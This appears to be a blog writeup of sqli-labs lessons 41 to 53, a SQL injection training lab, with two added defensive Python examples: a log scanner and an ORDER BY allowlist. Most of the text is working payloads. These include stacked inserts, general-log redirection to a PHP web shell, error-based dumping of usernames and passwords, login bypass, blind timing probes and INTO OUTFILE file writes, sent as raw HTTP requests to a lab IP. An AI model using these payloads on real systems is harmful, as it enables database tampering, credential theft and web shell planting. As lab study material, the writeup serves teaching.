sqlilab-Less-41-53-writeup

Less-41 Stacked query injection, integer, no echo

This level is the same as Less-39, except that query results are not echoed.

?id=1;insert into users(username,password) values ('bmf9998','shit');

?id=1;set global general_log = "ON";set global general_log_file='/var/www/html/Less-41/shell.php';--+

Less-42 Stacked query injection via POST request, with error display

In this level the password field is not filtered at all, so a universal password, ordinary error-based injection and UNION injection all work, and a second-order injection like the one in Less-24 is possible too. The point of this level is to test stacked queries in a POST request.

Error-based injection

POST /Less-42/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-42/index.php
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 253

login_user=admin&login_password=bmfx ' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(username,password) AS CHAR),0x7e)) FROM users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)#&mysubmit=Login

Universal-password login via the password field
shit' or 998#

Stacked query injection

POST /Less-42/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-42/index.php
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 121

login_user=admin&login_password=bmfx'; insert into users(username,password) values ('bmfd998998','shit');#&mysubmit=Login

I won't demonstrate the other variants; just perform them in the password field.

Less-43 Stacked query injection via POST request, with error display, parenthesised

This level is the same as Less-42: the password field is unfiltered, only the closing now includes a parenthesis.

Error-based injection

POST /Less-43/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-43/
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 252

login_user=admin&login_password=bmfx') AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(username,password) AS CHAR),0x7e)) FROM users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)#&mysubmit=Login

Universal-password login
shit') or 998#

Stacked query injection

POST /Less-43/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-43/
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 121

login_user=admin&login_password=bmfx'); insert into users(username,password) values ('bmfd77878','shit');#&mysubmit=Login

Less-44 Stacked query injection via POST request, blind

This level is the same as Less-43 but without error-based injection.

Stacked query injection

POST /Less-44/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-44/
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 119

login_user=admin&login_password=bmfx';insert into users(username,password) values ('bmfx44333','shit');#&mysubmit=Login

Less-45 Stacked query injection via POST request, blind, parenthesised

This level closes the same way as Less-43, without error-based injection.

Stacked query injection

POST /Less-45/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-45/
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

login_user=admin&login_password=bmfx'); insert into users(username,password) values ('bmfx0925','shit');#&mysubmit=Login
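The general log that Less-41 redirects into a .php file is also where a defender sees these stacked INSERTs, SET GLOBAL calls and INTO OUTFILE writes. The following is an added Python example, not part of the original writeup: a small scanner over constructed general_log lines (the sample entries, the rule names and the assumption that MySQL logs a multi-statement packet as one Query entry are all mine).

```python
import re
# Constructed sample in MySQL general_log text format (time, thread id, command,
# argument, tab separated); made up for this example, not lab output. It assumes a
# stacked multi-statement packet is logged as a single Query entry.
SAMPLE_GENERAL_LOG = """\
2020-09-25T14:48:02.000000Z\t   12 Query\tSELECT * FROM users WHERE id=1;insert into users(username,password) values ('bmf9998','shit')
2020-09-25T14:48:03.000000Z\t   12 Query\tset global general_log_file='/var/www/html/Less-41/shell.php'
2020-09-25T14:48:04.000000Z\t   13 Query\tSELECT username, password FROM users WHERE username='admin' and password='it''s;fine'
2020-09-25T14:48:05.000000Z\t   14 Query\tSELECT * FROM users ORDER BY 1 into outfile "/var/www/html/Less-46/less46.txt"
2020-09-25T14:48:06.000000Z\t   15 Query\tSELECT * FROM users ORDER BY rand(if(ascii(substr(database(),1,1))>114,1,sleep(1)))
2020-09-25T14:48:07.000000Z\t   15 Quit\t
"""

# Rule name -> pattern, applied after string literals are blanked out so that a
# ';' or 'sleep(' inside a quoted value does not trigger a false positive.
RULES = {
    "stacked_statement": re.compile(r";\s*(insert|update|delete|set|create|drop|alter)\b", re.I),
    "file_write": re.compile(r"\binto\s+(out|dump)file\b", re.I),
    "general_log_abuse": re.compile(r"\bset\s+global\s+general_log(_file)?\b", re.I),
    "error_based": re.compile(r"\b(updatexml|extractvalue)\s*\(|\bprocedure\s+analyse\b", re.I),
    "time_based": re.compile(r"\bsleep\s*\(", re.I),
}

# Single- or double-quoted SQL string, allowing backslash escapes and doubled quotes.
LITERAL = re.compile(r"'(?:[^'\\]|\\.|'')*'|\"(?:[^\"\\]|\\.|\"\")*\"")

def blank_literals(sql):
    """Replace every quoted string with '' so the rules only see SQL structure."""
    return LITERAL.sub("''", sql)

def parse_line(line):
    """(thread_id, command, argument) for one log line, or None if it is not an entry."""
    parts = line.split("\t")
    fields = parts[1].split() if len(parts) >= 3 else []
    if len(fields) != 2 or not fields[0].isdigit():
        return None
    return int(fields[0]), fields[1], parts[2]

def scan_general_log(text):
    """One (thread_id, matched rule names, statement) tuple per suspicious Query entry."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None or entry[1] != "Query":
            continue
        thread_id, _, sql = entry
        hits = [name for name, rx in RULES.items() if rx.search(blank_literals(sql))]
        if hits:
            findings.append((thread_id, hits, sql))
    return findings
```

Running `scan_general_log(SAMPLE_GENERAL_LOG)` flags the stacked insert, the log redirection, the outfile write and the sleep probe, while the benign statement whose quoted value contains a semicolon is left alone.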

Less-46 ORDER BY error-based injection

Verification methods

Ascending and descending
Ascending: ?sort=1 asc shows the sorted data, displays normally
Descending: ?sort=1 dasc displays an abnormal error

rand() check

?sort=rand(true)
?sort=rand(false)
Both execute successfully, and true and false give different results.

or
?sort=rand() random, different on every request
?sort=1 and rand() displayed once, then the same on every request
Use this difference to verify the injection.

Time-delay check

?sort=sleep(1)
?sort=(sleep(1))
?sort=1 and sleep(1)
When I tested this it easily hung the database; the reason is probably that the delay is (row count * 1) seconds: the payload says 1 second, but if the table holds a lot of data the total time becomes very long.

Error-based injection

updatexml method
?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23

Regular SQL query
?sort=1+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,password)+AS+CHAR),0x7e))+FROM+users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

procedure analyse method
?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)

Boolean-based blind injection

?sort=rand(left(database(),1)>'r')
?sort=rand(left(database(),1)>'s')

Time-based blind injection

?sort=rand(if(ascii(substr(database(),1,1))>114,1,sleep(1)))
?sort=rand(if(ascii(substr(database(),1,1))>115,1,sleep(1)))

into outfile, writing a file

?sort=1 into outfile "/var/www/html/Less-46/less46.txt"

Getting a shell by writing a file

?sort=1 into outfile "/var/www/html/Less-46/less46.php" lines terminated by 0x3c3f70687020706870696e666f28293b3f3e
The 3c3f70687020706870696e666f28293b3f3e above is the hex encoding of <?php phpinfo();?>

Online converter: https://www.bejson.com/convert/ox2str/

Less-47 ORDER BY single-quote error-based injection, single quote

This level uses the same injection method as Less-46, with a single quote added.

Error-based injection

updatexml method
?sort=1' and updatexml(1,concat(0x7e,(select version()),0x7e),1) %23

Regular query injection
?sort=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,password)+AS+CHAR),0x7e))+FROM+users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

procedure analyse method
?sort=1' procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)--+

Less-48 ORDER BY single-quote error-based injection, blind

This level is the same as Less-46, but it is blind, so error-based injection cannot be used.

?sort=1 into outfile "/var/www/html/Less-48/less48.txt"

Less-49 ORDER BY single-quote error-based injection, blind

This level is the same as Less-46; error-based injection cannot be used.

Writing a file
?sort=1' into outfile "/var/www/html/Less-49/less49.txt"

Time-based injection
?sort=' rand(if(ascii(substr(database(),1,1))=115,1,sleep(10)))

Less-50 ORDER BY injection, integer

This level is the same as Less-46, but the original mysql_query call has been replaced with mysqli_multi_query, so stacked injection is supported; see Less-38 for stacked injection.

?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23

Less-51 ORDER BY injection, single quote

This level is the same as Less-50, except that a single quote is needed to close the string.

?sort=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23

Less-52 ORDER BY injection, blind, integer

Same situation as Less-50, minus error-based injection; boolean-based and time-based blind injection can be used.

?sort=rand(if(ascii(substr(database(),1,1))>114,1,sleep(1)))
?sort=rand(if(ascii(substr(database(),1,1))>115,1,sleep(1)))

?sort=1 and if(length(database())=8,sleep(5),0) --+

Less-53 ORDER BY injection, blind, single quote

?sort=4' and if(length(database()) = 8 ,0,sleep(6)) --+
?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1
?sort=1' and (ascii(substr((select database()) ,1,1))) = 114 and if(1=1, sleep(1), null) and '1'='1
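An ORDER BY column cannot be bound as a prepared-statement parameter, which is why every level from Less-46 to Less-53 falls to the same splice whether the value is an integer, single-quoted, or run through mysqli_multi_query. The usual fix is an allowlist. The following is an added Python example, not code from sqli-labs; the column list, the `vulnerable_query`/`hardened_query`/`is_allowed` helpers and the table name are assumptions for illustration, and the resulting statement should still be executed through a single-statement API rather than mysqli_multi_query.

```python
import re
# Assumed table layout for this example (not the lab's own schema): the columns a
# client may sort by, in the positions that the ?sort=1 style refers to.
SORTABLE_COLUMNS = ["id", "username"]
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}

# The only shape a sort parameter may take: a position or column name, optionally
# followed by asc/desc. Quotes, parentheses, comments and keywords all fail here.
SORT_PARAM = re.compile(r"^(\d+|[A-Za-z_][A-Za-z0-9_]*)(?:\s+(asc|desc))?$", re.I)

class BadSortParameter(ValueError):
    """Raised for any ?sort= value that is not on the allowlist."""

def build_order_by(sort):
    """Map an untrusted ?sort= value onto a fixed ORDER BY fragment, or raise."""
    m = SORT_PARAM.match(sort.strip())
    if not m:
        raise BadSortParameter(f"rejected sort value {sort!r}")
    key, direction = m.group(1).lower(), (m.group(2) or "asc").lower()
    if key.isdigit():
        # positional form: ORDER BY 1 means the first allowlisted column
        if not 1 <= int(key) <= len(SORTABLE_COLUMNS):
            raise BadSortParameter(f"no sortable column at position {key}")
        column = SORTABLE_COLUMNS[int(key) - 1]
    elif key in SORTABLE_COLUMNS:
        column = key
    else:
        raise BadSortParameter(f"column {key!r} is not sortable")
    return f"ORDER BY `{column}` {DIRECTIONS[direction]}"

def is_allowed(sort):
    """True when build_order_by accepts the value; usable as a request-level filter."""
    try:
        build_order_by(sort)
        return True
    except BadSortParameter:
        return False

def vulnerable_query(sort):
    """The lab's pattern: the parameter is spliced into the statement verbatim."""
    return f"SELECT * FROM users ORDER BY {sort}"

def hardened_query(sort):
    """The same query with the fragment taken from the allowlist instead."""
    return f"SELECT * FROM users {build_order_by(sort)}"

if __name__ == "__main__":
    for value in ["1 asc", "1 dasc", "rand(true)", '1 into outfile "/tmp/x"']:
        print(f"{value!r:42} allowed={is_allowed(value)}")
```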

posted @ 2020-09-25 14:48 by 皇帽讲绿帽带法技巧